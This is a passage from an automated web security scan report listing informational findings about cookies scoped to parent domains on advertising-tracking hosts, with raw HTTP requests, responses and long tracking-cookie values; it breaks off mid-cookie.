Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; put_2132=E3F32BD05A8DDF4D5646D79640088B; rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1; rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:10 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1%26733%3D1; expires=Thu, 11-Aug-2011 20:40:10 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.34. http://pixel.rubiconproject.com/tap.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=6811&cb=1310503191 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.imiclk.com/cgi/r.cgi?m=3&mid=GQuHAQvv&did=games
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1197=3460050161923843111; khaos=GOVBRMNC-I-DXQD; put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; put_2188=FoBpo1AIykup_RbIztZ-hw; lm="20 Jun 2011 13:04:50 GMT"; ruid=154dd07bb6adc1d6f31bfa10^10^1308614585^2915161843; put_1902=NsCNKTbG1n8vl4t9NZDDK2fBjy8vnIx8N5b7JrdL; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; cd=false; put_1986=3420415245200633085; put_1185=4325897289836481830; rpb=733%3D1%264338%3D1%267100%3D1%266560%3D1%266643%3D1%266198%3D1%265576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%267187%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1; rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%267187%3D12806%2C0%2C1%2C14%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C; put_2132=E3F32BD05A8DDF4D5646D79640088B

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5576%3D1%265421%3D1%265573%3D1%265720%3D1%264214%3D1%262372%3D1%262112%3D1%262497%3D1%262202%3D1%262496%3D1%262197%3D1%262579%3D1%263512%3D1%263810%3D1%262374%3D1%267249%3D1%265575%3D1%265852%3D1%264222%3D1%262114%3D1%264894%3D1%266432%3D1%264212%3D1%264120%3D1%266286%3D1%266811%3D1; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=4212%3D11993%2C1032%2C4%2C%2C%265421%3D11993%2C682%2C3%2C%2C%265852%3D12124%2C721%2C3%2C%2C%264214%3D12267%2C471%2C2%2C%2C%266432%3D12470%2C499%2C2%2C%2C%265576%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262372%3D12738%2C0%2C1%2C%2C%267249%3D12753%2C0%2C1%2C%2C%262112%3D12753%2C0%2C1%2C%2C%262497%3D12753%2C0%2C1%2C%2C%262202%3D12753%2C0%2C1%2C%2C%262496%3D12753%2C0%2C1%2C%2C%262197%3D12753%2C0%2C1%2C%2C%262579%3D12753%2C0%2C1%2C%2C%263512%3D12753%2C0%2C1%2C%2C%263810%3D12753%2C0%2C1%2C%2C%262374%3D12753%2C0%2C1%2C%2C%264222%3D12770%2C86%2C2%2C%2C%265575%3D12844%2C0%2C1%2C%2C%262114%3D12857%2C0%2C1%2C%2C%264894%3D12881%2C0%2C1%2C%2C%266286%3D12945%2C139%2C4%2C%2C%264120%3D13027%2C0%2C1%2C%2C%266811%3D13380%2C0%2C2%2C%2C; expires=Thu, 11-Aug-2011 20:39:53 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

10.35. http://r.turn.com/r/beacon

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.turn.com
Path:   /r/beacon

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /r/beacon?b2=uAuceuD961GAkMIYzv5AQziOQ-eCNWHV6KkD_P0UpEIHL-lTlput787BXKmhwi2DTI-ZOLCjHLM7w-8RpLcB7A&cid= HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://fls.doubleclick.net/activityi;src=3076801;type=homed040;cat=homed063;u1=homepage;ord=1294428578112.2744?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adImpCount=jPCRKqrj87qIJxtlMQWAeEChT2n2hjlNeUtfI18EVvCY481wEkFtGX7HudJA1SwJI3d8wh-8F3M_mXcdjcS-VSm0eLaoIKxUGXp9LrfCkU9_tnfsaUjBl08t5WPRK0VURVro0VaYJSFBW8ummLzmaIKBmXLKaNQC_VstFH2_fFpKQkzhSzd0OA7TdBU9TjZEJGXtc03lRAW7XQ4DISJNToVALrQWz2MTLkxqGX2dkixiiuCgw-RUBPrhyXIonq-JO1Bp39fVI570M3anNYXEeUs1tPAJ0EW-1VMg8V7a5wldzyMGDGIyTnWkwLiiAh9MnoUAhDiUl9Tegk8e5loBtCPfUfWmFvuHa7ho64SbyNRCdB0gGLuWZn2SFARzFJPESwQcmlx05sJTCiLTcgCP4At5Nkw2i8ci7zeXoamyfIkXLuYA-Dhd_NCbS18tUNtNvkWLzJ6aRrpGreADONKQFjqdAq7HLak39li3oOzBb2LeZa7kJWdY4s3_LxRnaveh3zRKhr_QKICSCDvtEvXL5bc_DW9fRIIhGqjaZpBQKPuvEW4pltifd2UFOGJBUm-HNrIvCCgnCtouI-Uiugr_XDqnokT_uSlOVd9om3L3_Zyu-SvKhx26d2lgxRL2g7NnpnufmqwPr0iX6TO_QvAchAci1X1kdq4IOav-VGBUnPFENQMte8mJeFRkxXb-wFJ5RVro0VaYJSFBW8ummLzmaNGHuZ00Doye8JlLv5mr5PFKQkzhSzd0OA7TdBU9TjZEAKZ1XvhQcWRwSquFFdyqk27PUbblbYukMk_ukxgrNp1iiuCgw-RUBPrhyXIonq-JrVUsFGMjIsjG4wG8JccNY0s1tPAJ0EW-1VMg8V7a5wn-FB-cNjGuev6cKfXYBTnN0_vou2SdMt8u86ZsS3JrqiPfUfWmFvuHa7ho64SbyNQHZddyBwQ_bn6DeUZJIktJSwQcmlx05sJTCiLTcgCP4PkIlx5s8TLQpLlToa_KmjIJFHg-6pvIHl5Jd-boptVivkWLzJ6aRrpGreADONKQFi1uWhCbBLDkUUl3GB-cia7eZa7kJWdY4s3_LxRnavehkKIyZUcKn4gaSbbrzqSrcgqUnZs_qTc4J1uECWvW6WbTYemUMl4rww0Ahse7Jfbjh8YLajdpYA5oCRPEinWDNzqnokT_uSlOVd9om3L3_Zxs-1IWnYFHuATbbO_y4X0qnTAQXKSKZxRRHNLIhO3aIaSqEypMHifOKCbgAvu2-dYixi2mthDBgkkh8E1XVaeYRVro0VaYJSFBW8ummLzmaFVfdYHK1Q73JpHXN0tZ5ChKQkzhSzd0OA7TdBU9TjZE1kmOSSok1OTXuW9iz2m4nL5yE_6sd6seuxofVhtsYmBiiuCgw-RUBPrhyXIonq-JQurUvISATSSNOXvmuhMCV2KK4KDD5FQE-uHJciier4klqT8ZcugfJqC9EwK5ktSgSzW08AnQRb7VUyDxXtrnCWozIMOsCXwOUoX3GwmeVVAxi8wzskQPsxtBtldyMSwagsPhD5djythOHSHCTJOhXN8kothY4cGzuNEdryxzqqlLBByaXHTmwlMKItNyAI_gA5nIMgtWWpg9SGtTLubci8mKqUVNtCEf11hjerFm783rueT8thuReMGYM-G8N401JqMaNEKucbt7MzwWQQWU-d5lruQlZ1jizf8vFGdq96EVQq5esqu6oyUY2zlzU2xLXWhOIfbu6nlVGazQ3C00oYS8zm8KaUf2JPX_XkHFplCbza_ABfjL7BKJWmajZwI8OqeiRP-5KU5V32ibcvf9nKIPnlMyG4VsL_dpoB-0W9QGvLE_z_KyAskRioKbfxN_786M9IuI8BYnDc-poA-MUnfZxmx8Z1na_56NWnVp5lVFWujRVpglIUFby6aYvOZo-guTtl2FC1HRuw7-BKiPgkpCTOFLN3Q4DtN0FT1ONkRfEwEV-i4hDFcRNIjoo
2NgkPVO08UdjTRS6iKsNti_SGKK4KDD5FQE-uHJciier4kPyz-Wufncl9LyPoL9B1QKSzW08AnQRb7VUyDxXtrnCYqBIOxmA7cQDFoERRAumqjQS-E5nxed_shBlbXuObLDI99R9aYW-4druGjrhJvI1JH00lIUEmEEA_OFUDNzutxLBByaXHTmwlMKItNyAI_g_3bTqCYCGbHkXEVzPY_01mXeNri_O61lm1ldtHVrpR7ZPRGnTyb4BtK8arS2F9YZe4UCz5TMA5hwrPrqery6C_wkRIQCoel50LHttKKxvj2T-81UMTQPlYAknpDpTSLEO5HiathQKE8omxVc53FpCRoxDfNmYDnxg0EvFrwRe3pCS4dcida2s-s0XQ4z8fCn0-2F-mOoQpGwjdYnRQCARZtq_gHnWf9fXfe0G5ZJVnGpH8LKKIm0TYD_Luo27v_Fd79BPBBGXhysRhWpW1cyG4cyxzjZGmjTf1aqiATmAjS8PU8Ims583iYmtl6BnonGOZ_I42pI-l997CutSY5UTnU6t7Hj0VsEozVWpOhdHdFbLfPqvGJUWoA-TUxLJGtuWy3z6rxiVFqAPk1MSyRrblst8-q8YlRagD5NTEska26shJ8rvIZ2pEIvj7vJYr_-ftZVQVVx5oyA1oNVdb0c2RvgUG90xsnNOLDcsndxj6Hfhp4cgON-zdligsRs6_1T34aeHIDjfs3ZYoLEbOv9U9-GnhyA437N2WKCxGzr_VPG0U7eaD3Hbtxwd0g2BAEnxtFO3mg9x27ccHdINgQBJ8qENCoPz5YPQkhGm2FiUj3LFz3e1wa31-DKI83R83jg3QTL9zDrzTFlXoiMqjuSWt0Ey_cw680xZV6IjKo7klpI3j9xuCx21BIxBdXN5YAR9AhrAwqavcLA2O6a4z37Lsij7qsRPo1Q9IcnQsYBZ5nZ4Yik6WYEG4S1yIWi95cAawB_d25XmA1YnkFKy4M4_IsLKOVSlL41zvQ6wOKAHEjq7nKInFrgoG_62xoiLBKT6u5yiJxa4KBv-tsaIiwSk-rucoicWuCgb_rbGiIsEpOvDsfne5seg63D4x3flsyZrw7H53ubHoOtw-Md35bMma8Ox-d7mx6DrcPjHd-WzJlOSrp14Y383TLXFJ1T7HeQDdh5RodnqZ0dgGASOf1Fng3YeUaHZ6mdHYBgEjn9RZ6k3CneyeK26bqX2BslrNlwDg97pn0xq8XVtSFY17J1rA4Pe6Z9MavF1bUhWNeydawOD3umfTGrxdW1IVjXsnWsZmDwoJlEZXfDBjNrKbkdHGZg8KCZRGV3wwYzaym5HRxmYPCgmURld8MGM2spuR0cbb0sPsXWgw_x9D6jnx5LK_2BhDosUowXxXmwB90G1tj9gYQ6LFKMF8V5sAfdBtbY_YGEOixSjBfFebAH3QbW2GhE7gFloT4X513bbUoowJpoRO4BZaE-F-dd221KKMCaaETuAWWhPhfnXdttSijAmjoFfr6E7AtWKXcAv7zPgNhKraltt_znEUtPzey_YSNRSq2pbbf85xFLT83sv2EjUUqtqW23_OcRS0_N7L9hI1Fz-QUXxY9m0RT2v_0PtAEz3vMJW6Nolrhqx2yRbBnwHeM8DMgjvm5t97BtYytOx4Rqhj3O8p-XR3nA6DvXKpTl; 
fc=NPwnTj55SxablmgxgOU6YvTAau0fxQm9Ss2FVtOc0fRwe2fiMiJstcorldPAQEWsjtR00WuVUesotFeF8b0iqzTwskhjzr5X5fLnW2Y1L8oWeSZAoSqfzCTWGJqSVzUxwmWj6rOwJQbNe1FGkQ72Mr3ZyRv0KSWu8UtGn86vdZZ2Bxw8hDOLkguYqml5zW-MINBiIQ09VuaB6H4kNZ3jvWDXo_Ub5NvFSqNxsTqhNOEJzdGEYQUbYRsENlG1EkxlHr-vpMpIww2oeMaNqJcAGNVCVYgScgvT-7lnf3tWEtoI26ZIhO_EYD2Jv5etTb7nPXORZ_ihz3v_EDqUfBGd38kaFp7wmgHwSln4BB0aAU-Y-fE6mCrmAAKxJpNINZh0gYrE3U6bhGdZv_0Ofvauqo02tkR5MgBK5U8r1oXGHyKLM2r82BMAlsOE4kKakojRElg7FxL2FmmNWsvuLk3EV1Ob1kR0cv3Vim-wWYu2PuOaPtJF5zGBev3l88f3V44c; pf=Cx8u84bEVqWzcxtUTzqNJIC7M-V0K1YOk9JpwDx9iJ-IAwkcA0x7pAMOQ8HX-tAorSoba3JeN-xk7oapFFvy3VH1kGUf_WpfPdQV1CZyaCYHdxKvkIPObEkSzEZrTaygnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB8lg8V6tRDdbWqGKQtvjC13uBmE_sR164gzV3uysVQ2QdRHkJfimLFS7WOEQG6pvwSUmGlP7plGVHEv-ZxqEZIrcXFzn59VucOMk1jaoS14k8c8mLEcBETNnyzMsneeF1syYFCrcdo0CAg55mHqrIrWWaQmkKSFcJcPgoCKH0sJxrIzPzQpSNx_CIsd1kfXDyjA2LDFvKhvZ1QEIEm7dh40PZjNQZ9Hd8MNm3JX-_S9NWe8WHK4NSvES3Z9QGGhu5Djvyp-YMlPmNhLTDojIlhjAjhS9eWzjsUsw9SoKtKpC8f_2RWCzOUGxk_Wz1rfZiWbxbJrTUf-aVzxXXriNIKNdAUsvGjo4dYjRw0gI-IRCZzMEukVXPbKwT_hFRpA_sDy9QeL7VpgT4tBIngc08Ws8FJltK3E8OgPtJy7Eoz0CJTXR5HKs3-hHShC6aRn6t8BfcQz0Dd86t8gXoPdMBgjtbxBbJEH3dHhKkO193ago_XUFSyzIOxm_x0ybvjW_DUjtRNJhmcOwDiyv8T_KQGDJqVkw-kV9dntkmeBLp5GGHSF_cakLXoawmQZ1OX2qeRpP5uEXb79RoRHLsAMGKSCy052Li315VZE1PNankBD1hqe7zgE_PsLCVtuTX5L-v-S8ut840ECOM1HdJH7s33O1_AQ4vnHmUUW7H59jc99zMgQ2O6JOMOztY9nPjblaNmLc_7YgA59y0a1NS04dNn076vc7MQQckLwsVvHiz-KvY1jzkP4PDCgK5hta8dPDsz-8OsEQFzGgGCvF0GIxS5Nbkr7--zZc_wQ6biDWOUTMZ5Aed2sucJPSwXllukkVa8jtckMV353gLOstRvTs7wASU8WY0U8nc5T3Av462s8LVUtne46_vE-foJkYKgxvmOzPagHCwrL0iRXFbrF0GCQ-kKVv-DNPSwltjGZxUewqaXFK9zRqsdpcWcQFcqw3510ThZFcxTfyigoCKl2TzGDotY3DBS9xlfQHYC5NuwXhkTkrJJbSXHXzZwKdWOAUKxEjjU_DLSyuHljlkbCfX905581fc21Bgmh6aLYPJTQgHe0BGkQOaCtNgR397GwlpFMpZQrcO6DVQmpJqLrCO7vWAYrQFbx5r__P2OsEwDabv6-ufGYt0XCG8E1NsefbXzsQG48Hb_4YCrX9j8YOFwzlL7wHF61
n06A78wdBUnw_3qGk8dpf23zBzZ7_iSkW1LOMSCUhd0R0x_cMO6r5__qTaR3ipdUC2utivZgqLqHLD-yqO6fpR1lhP8Zedk0K33X5JX5XybzWTLoWHcBwhx12hxg_p42eTH3yUmVmrDFWtD-IWnXZh1DCyIriOz-euhSpNmXzKI7JHUzsQgubpCr0mdnzZcTmsylkJAW1ccTwu_iUiq76dV6KWv7ygWscTVmC3YMVvTh6_xY8MMl9E6n-9RK0_l1NeBTl2ILEX52m6Q5kUHHzsBztnLAvmGkYSq8tICkY-ZC5dDhZ5KTLIH_WRUAyZF0LVsouafm1vlWe8-kD_qlMWuKHZ35EkcV9gvNX-0wo3lOomVgKFrOcQT6xUJWITG_43_30FYpbAkMd7Zbz-AKt6UVPMV5C7YzmVgAWIMgrao83tjG2LhMgTlrEosdVyiYkUv0nonkKf66fnnlOzVyS438ol7N4GeGwHdaOglNTO5ywZIRQinOutEqt6KbKBEKntCrb7D6e9iRa3ianVsa8MiDHTEWIi5V0LqJtieKL24UwL5hJC4BX20Zz5y_GGgIdUuyJds9aivGRyjWcqpaPTAjzGh5JPWCUUY_ncjEyl8hW5m6EeUIZscn-4DKBwi99P9RjrZE_dPetOdSseWVwQIkyfdrdePcNT3WyEkrexuDA-qqk5NTFsC_ByQmpvwrjjDb0J7HUp1JPqiZqnwZ2Go5gFw87E0mX-gZbv9puVGpdNS4dePD3rEUqTIjSZFc7HCOlZdFTBhQt4A-FXt7HgLTPKjvKf5KVmvAPipFhdTouhjm4kPiXzApwuLyi6QSYFNiPyjgY3lBpe16jsizuDZnGlGarhWrjLVHCsfqBtkFSkk1SR2w_LQXcfc7DxO-UAUeZsKJ1LvJSuWsg1SH4N8_SCcaTqmc1uF1dp4fIimKkPNOg_dvWujk-Cj7VuMxKaYMlwrje52Uk5uf9NUjcjmDMF-1AlpBVtJMI6JGdCbY2NTrM7fSz49bOAjLW0MnQwDQa-Nv56fQL3xrXetwOaAY94pbLyYsPY_cQCBLLJhWVnk_lzn51ZCBNx7hJnm5dzmxgMi0veCS6T8Z5drmGjNmeb-gwzIMUAVsybSv6VHcWhnJ7FV4AblxMpEP0Y4Z9EqMnp8_Ptdh8Vlhtd1gYA-UFdmq3XbM_G1i3gFKk4PvEglQliEj-apgE-QUPu46suvh10d0G0S8DH0wFapdtYn6ohVZwB_sfttfT1YXUa_yXy15CD2u-uL2x0k24zeqEwhSpaHXsFwWxuCYlbx3sc8b_L2880suANXVY7RQ0ghbVhqjWmaKlZJZyI31XFJMg_Xm3ZaeTQQI_73qieHyLOUlYyXWWsmaKjBW9zGwtWdK7Mq4vwOBlARYld_nFauuoG4pRJN5QW0S4Ab_1nMPuF7At7uTRRiqDaV84E--0JgS5fcQqBMnq0HjkRtgk-XMCUZPiJUYVr5I10hlfZFNvymYKjSCq8EtoB0SCR3g100hLwHmY-Bd0Px_ERQa4V8H03Ad47KIDq9L6hWd8EKxxuk70qq5bXgGe0BBwIcaAGo124_Fpc9B9PFgRwf7L48PocBRONLy3d-V4PRgNjGQd8w36iokpDpKkptN7UsKIOKbVuNydbjtyAC4c1Iwtu4KcdbHriwFkNHZ84RB467ymyeh38Hrbp8Hb8-H8l8B1Z3JWEnD4C5pe-t0ccouIbg8SdMpwrtgnNNEVhmnTlU60JId0MOL6TZt0DdlgiUII8665euFIvTFi1kq9Jbjc-hN8nNe5t33s_4slnCqQsf7S3WAlj03YWHyJRno5upAQH1stolYHPvqQTECcUpZ67ooRzBV4mkY3bKZEn_LF-ss2qc9_oFL9fN5_ShqXOpZWPh4CRijgdjXszUE1r9Us2uEGPpDbSA5CU09EIO8uHCZTpQ2E0CSOfk4oag3R69kTz8pBBQ8HMWQVbWm; 
uid=4325897289836481830; rrs=3%7C6%7C9%7C4%7C1002%7C1005%7C1008%7C1%7C4%7C7%7C10%7C13%7C1003%7C1006%7C18%7C2%7C5%7C1001%7C1004%7C1007; rds=15156%7C15153%7C15156%7C15167%7C15161%7C15153%7C15149%7C15146%7C15151%7C15156%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153%7C15153; rv=1

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0
Pragma: no-cache
Set-Cookie: uid=4325897289836481830; Domain=.turn.com; Expires=Sun, 08-Jan-2012 16:35:47 GMT; Path=/
Set-Cookie: pf=S75Tx67zHlqJEqjM2EpYohyQmYHijzPhSURiZdWBt_mIAwkcA0x7pAMOQ8HX-tAoPwLHSpO1dFMRfUIqRRj7O8Bymq9LvAUz5_ne2Gc83NMHdxKvkIPObEkSzEZrTaygnQ3ziRBzpEB5dtK5nAeBUmYbbn7O8vmG9T4ZvTBxZ-fkUczbVJT5Cai6PVkpiYM250Hn9REtTxKxE8sY6J3ypnin2DltV7TDetw9hjspxXZhD8p41r9TwMfEMg-G1XemtTB2tozm01YLbZIiUMvmqnqcRK5l5t99h9o1nyRJGB_wu9pn5eTDfXokdHWgv_KeSzTQwXISudy28fYFPvd3f8VkEPtv4pKGwYcW3D48lxwQzHAAbxKgRVL2b1l3a-ZYStRSAsLDg3EjDE1-MNGS5MvaPliD3cX9A60XNjJY548KG_WLadoSJGb4bjShEkEZMGlUJzSoxDtdJd5C-xayMUeIxLF_gu6KpFvskgSkqDyRvL1xj_WZGBHL7tmny3OF86KonSkyTJZS2Pe0J-pv-0ZlHM0GPFGGYjp0ziZtko5hTj6dXRRh4QZTEXVL-ge7iEWTOvmvi1zjeqbpxK565E7aFVyxKpvzjSVsAgZL25tnEZo1QLIx3A2B_Zq8odU2eiU467uOPvqZNUB0D-Z1h-Ye081m6oj-PGJfEQ6zkfS-V8iUpuZ8eodRw_lv4giezXN6TUonRbapcFN61G2o5g0IZKzKM_gBe3dP1E8FWQkM2fHCdNoeFK3r8z3rr_IMZGe2RqXjfUSv4PoS9BBdLPDTtDv5lO-7qW24wGeBDKGVRc1PUdvmcIfa70fwlgva-qLtly5tg-N0KJMS8LqLG_FacEC-83hgcFizrbdl-nuZiKc3wX7GiaI0EAPGkBVFePfSQ9yWsEBRfjuW4AHrUV5yIcO0NRkDqgMD2WAQJbF49vWqArbDJ0yoqifuBT8rwLezGBmoueobB2WMNaTxX7mxpMrQn0yES1bZJmLjjZIAkmIJxZ7xeYCj5l4gUPXVoOVFXuczpXr_MUqk_vCUthA8oixyElU3ANl1dD2qYov9BuL8l-AQdbit5mSqhcAge1f9v2DKdrS7tpbkEM0iqxaG6RswzxutKhO2dQbnqnli05-eD_Or7WQnS-BLdBqYTneq0zKFqU49VNcF9tmltxT1NaEJFhMivfKM5iLXXLqA3JaBVqauWRwqI8S_3Fn-BME0WtjmL-sTf3Nf93Yws_1ud7s0IRU8-3diGW0YihRapWhNVwJ8XDqeMYmLmHyM3mIk7c61SB7-8FMxyiC0cSExJSH89TrP0KtOzOBfTvxHeJg54zjksNPu1zZwzGr7u7c4UKg_yErLQJ0YMrQaTHe0BGkQOaCtNgR397GwlpFMpZQrcO6DVQmpJqLrCO7vWAYrQFbx5r__P2OsEwDabv6-ufGYt0XCG8E1NsefbXzsQG48Hb_4YCrX9j8YOFwzlL7wHF61n06A78wdBUnw_3qGk8dpf23zBzZ7_iSkW1LOMSCUhd0R0x_cMO6r5__qTaR3ipdUC2utivZgqLqHLD-yqO6fpR1lhP8Zedk0K33X5JX5XybzWTLoWHcBwhx12hxg_p42eTH3yUmVmrDFWtD-IWnXZh1DCyIriOz-euhSpNmXzKI7JHUzsQgubpCr0mdnzZcTmsylkJAW1ccTwu_iUiq76dV6KWv7ygWscTVmC3YMVvTh6_xY8MMl9E6n-9RK0_l1NeBTl2ILEX52m6Q5kUHHzsBztnLAvmGkYSq8tICkY-ZC5dDhZ5KTLIH_WRUAyZF0LVsouafm1vlWe8-kD_qlMWuKHZ35EkcV9gvNX-0wo3lOomVgKFrOcQT6xUJWITG_43_30FYpbAkMd7Zbz-AKt6UVPMV5C7YzmVgAWIMgrao83tjG2LhMgTlrEosdVyiYkUv0nonkKf66fnnlOzVyS438ol7N4GeGwHdaOglNTO5ywZIRQinOutEqt
6KbKBEKntCrb7D6e9iRa3ianVsa8MiDHTEWIi5V0LqJtieKL24UwL5hJC4BX20Zz5y_GGgIdUuyJds9aivGRyjWcqpaPTAjzGh5JPWCUUY_ncjEyl8hW5m6EeUIZscn-4DKBwi99P9RjrZE_dPetOdSseWVwQIkyfdrdePcNT3WyEkrexuDA-qqk5NTFsC_ByQmpvwrjjDb0J7HUp1JPqiZqnwZ2Go5gFw87E0mX-gZbv9puVGpdNS4dePD3rEUqTIjSZFc7HCOlZdFTBhQt4A-FXt7HgLTPKjvKf5KVmvAPipFhdTouhjm4kPiXzApwuLyi6QSYFNiPyjgY3lBpe16jsizuDZnGlGarhWrjLVHCsfqBtkFSkk1SR2w_LQXcfc7DxO-UAUeZsKJ1LvJSuWsg1SH4N8_SCcaTqmc1uF1dp4fIimKkPNOg_dvWujk-Cj7VuMxKaYMlwrje52Uk5uf9NUjcjmDMF-1AlpBVtJMI6JGdCbY2NTrM7fSz49bOAjLW0MnQwDQa-Nv56fQL3xrXetwOaAY94pbLyYsPY_cQCBLLJhWVnk_lzn51ZCBNx7hJnm5dzmxgMi0veCS6T8Z5drmGjNmeb-gwzIMUAVsybSv6VHcWhnJ7FV4AblxMpEP0Y4Z9EqMnp8_Ptdh8Vlhtd1gYA-UFdmq3XbM_G1i3gFKk4PvEglQliEj-apgE-QUPu46suvh10d0G0S8DH0